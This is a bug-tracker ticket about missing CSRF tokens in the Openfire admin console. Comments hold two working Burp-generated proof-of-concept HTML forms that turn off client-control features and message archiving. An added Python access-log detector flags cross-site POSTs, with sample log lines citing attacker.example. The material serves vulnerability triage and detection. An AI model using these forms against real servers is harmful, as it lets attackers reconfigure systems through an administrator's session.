
Admin Console Cross Site Request Forgery (CSRF) Vulnerability

Description

Originally, this ticket related to a CSRF vulnerability in the admin console reported by Sven Tantau (see Ignite Forum URL) which referenced the now defunct site [httx://1337day.com/exploits/21338]. This ticket has been updated with more recent info from hyp3rlinx.

Vulnerability Details:
No CSRF token exists within the Openfire Admin Console, so a form hosted on another site can submit state-changing requests to the console on behalf of a logged-in administrator. Examples include:

  1. Changing the admin password
  2. Adding arbitrary users to the system
  3. Editing server settings, e.g. turning SSL off
  4. Adding rogue malicious clients with permit access (e.g. allow all XMPP clients to connect)
  5. and more...

Exploit Code(s) / Full Details:
https://packetstormsecurity.com/files/133554/Openfire-3.10.2-Cross-Site-Request-Forgery.html

Environment

None

Acceptance Test - Entry

None

Activity

Simon Waters
December 16, 2016, 12:26 PM
Simon Waters
December 16, 2016, 2:14 PM

Ah, Dave clarified for audit-policy the update fails, but the values shown are in the request.

Simon Waters
December 16, 2016, 2:15 PM

Client Control also has CSRF on features.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.168.56.103:9091/plugins/clientcontrol/client-features.jsp" method="POST">
<input type="hidden" name="accountsEnabled" value="false" />
<input type="hidden" name="addcontactsEnabled" value="false" />
<input type="hidden" name="addgroupsEnabled" value="false" />
<input type="hidden" name="advancedEnabled" value="false" />
<input type="hidden" name="avatarsEnabled" value="false" />
<input type="hidden" name="broadcastEnabled" value="false" />
<input type="hidden" name="removalsEnabled" value="false" />
<input type="hidden" name="renamesEnabled" value="false" />
<input type="hidden" name="transferEnabled" value="false" />
<input type="hidden" name="helpforumsEnabled" value="false" />
<input type="hidden" name="helpuserguideEnabled" value="false" />
<input type="hidden" name="historyEnabled" value="false" />
<input type="hidden" name="hostnameEnabled" value="false" />
<input type="hidden" name="invisibleloginEnabled" value="false" />
<input type="hidden" name="logoutexitEnabled" value="false" />
<input type="hidden" name="movecopyEnabled" value="false" />
<input type="hidden" name="passwordchangeEnabled" value="false" />
<input type="hidden" name="personsearchEnabled" value="false" />
<input type="hidden" name="pluginsEnabled" value="false" />
<input type="hidden" name="preferencesEnabled" value="false" />
<input type="hidden" name="presenceEnabled" value="false" />
<input type="hidden" name="vcardEnabled" value="false" />
<input type="hidden" name="savepassandautologinEnabled" value="false" />
<input type="hidden" name="updatesEnabled" value="false" />
<input type="hidden" name="viewnotesEnabled" value="false" />
<input type="hidden" name="viewtasklistEnabled" value="false" />
<input type="hidden" name="submit" value="Save&#32;Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Simon Waters
December 16, 2016, 2:23 PM

/plugins/monitoring/archiving-settings.jsp has no CSRF

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.168.56.103:9091/plugins/monitoring/archiving-settings.jsp" method="POST">
<input type="hidden" name="roomArchiving" value="off" />
<input type="hidden" name="maxTime" value="0" />
<input type="hidden" name="messageArchiving" value="off" />
<input type="hidden" name="maxAge" value="1" />
<input type="hidden" name="cancel" value="Cancel" />
<input type="hidden" name="idleTime" value="0" />
<input type="hidden" name="metadataArchiving" value="off" />
<input type="hidden" name="maxRetrievable" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Simon Waters
December 16, 2016, 2:38 PM

/server-db-stats.jsp can be disabled by URL, this would be rather a lame hack. Or the collected stats cleared, also lame.
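Added detection example (not part of this ticket or of Openfire): the Burp PoC forms above are submitted from a page on another origin, so the resulting POSTs to admin console JSPs arrive with a Referer pointing at the attacking page, or with no Referer at all. This Python snippet flags such requests in an access log; it assumes an NCSA combined-format log that records the Referer header, and the log lines, the console host 192.168.56.103:9091 and the host attacker.example are constructed samples.

```python
import re
from urllib.parse import urlsplit

# Constructed NCSA combined-format access log lines (assumption: the admin
# console's access log records the Referer header). Not real Openfire logs.
SAMPLE_LOG = """\
192.168.56.1 - admin [16/Dec/2016:14:15:02 +0000] "POST /plugins/clientcontrol/client-features.jsp HTTP/1.1" 200 5120 "https://192.168.56.103:9091/plugins/clientcontrol/client-features.jsp" "Mozilla/5.0"
192.168.56.1 - admin [16/Dec/2016:14:15:40 +0000] "POST /plugins/clientcontrol/client-features.jsp HTTP/1.1" 200 5120 "http://attacker.example/poc.html" "Mozilla/5.0"
192.168.56.1 - admin [16/Dec/2016:14:23:11 +0000] "POST /plugins/monitoring/archiving-settings.jsp HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.56.1 - admin [16/Dec/2016:14:38:05 +0000] "GET /server-db-stats.jsp HTTP/1.1" 200 2048 "https://192.168.56.103:9091/index.jsp" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# host:port values from which admin console forms are legitimately submitted
# (constructed; take these from the real console URL in practice).
CONSOLE_HOSTS = {"192.168.56.103:9091"}

def suspicious_admin_posts(log_text, console_hosts=CONSOLE_HOSTS):
    """Return (path, referer, reason) for each POST to a console JSP whose
    Referer is missing or names a host other than the console itself.
    A cross-site form submission carries the hosting page as Referer, or
    none at all under a strict referrer policy."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].endswith(".jsp"):
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            findings.append((m["path"], referer, "no Referer"))
            continue
        host = urlsplit(referer).netloc
        if host not in console_hosts:
            findings.append((m["path"], referer, f"cross-site Referer host {host}"))
    return findings

if __name__ == "__main__":
    for path, ref, reason in suspicious_admin_posts(SAMPLE_LOG):
        print(f"{path}: {reason} ({ref})")
```

A missing Referer is a weaker signal than a foreign one, since privacy settings strip it for legitimate users too, so treat "no Referer" hits as lower confidence. This only surfaces attempts after the fact; the fix remains a per-session CSRF token checked on every state-changing request.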

Assignee

Dave Cridland

Reporter

wroot

Labels

Expected Effort

Medium

Ignite Forum URL

None

Components

Fix versions

Affects versions

Priority

Major